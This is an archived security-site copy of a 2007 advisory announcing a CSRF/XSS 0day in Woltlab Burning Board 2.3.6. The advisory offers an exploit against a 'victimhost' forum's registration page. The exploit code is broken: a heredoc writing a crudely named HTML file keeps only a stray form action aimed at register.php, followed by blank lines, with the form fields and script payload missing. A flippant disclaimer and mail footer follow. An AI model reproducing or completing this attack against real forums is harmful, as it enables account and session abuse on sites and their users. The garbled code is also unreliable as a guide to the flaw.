TUCoPS :: Web BBS :: Frequently Exploited :: c07-2514.htm

Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day
Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day
Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+--------------------------------------- -  -- -
| SaMuschie Research Labs proudly presents . . .
+-------------------------------------------  -- -  -  
| Application: Woltlab Burning Board (wbb)
| Version: 2.3.6 (others not testet)
| Vuln./Exploit Type: CSRF/XSS
| Status: 0day
+----------------------------------------- --  -  -  
| Discovered by: Samenspender
| Released: 20070302
| SaMuschie Release Number: 5
+------------------------------- -  -- -

CSRF/XSS Exploit:

cat < wetpussy.html

action='http://victimhost/wbb2/register.php'> 




















































EOF

+-----------------------------  -- -
| Lameness Disclaimer
+------------------------------------- - -- -  -  
| SaMuschie Research Labs was founded to publish
| vulnerabilities within well known software products,
| which are easy to discover and exploit.
| 
| SaMuschie researchers just spend a minimum of time
| and knowledge for each vulnerability. Hence readers of
| this advisory are requested not to ask any questions
| to the researchers.... they don't know the answer ;)
+----------------------------------  - --  - -
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF6AyiMFgfGpQK8VERAsieAJwIMk+g0Y70cV6dR5YtsMfq4U+5fgCfWWzD
Qg6at+bMTnvHbw0SYyXk5ko=7wPg
-----END PGP SIGNATURE-----




=09
	=09
___________________________________________________________ 
Der fr=FChe Vogel f=E4ngt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH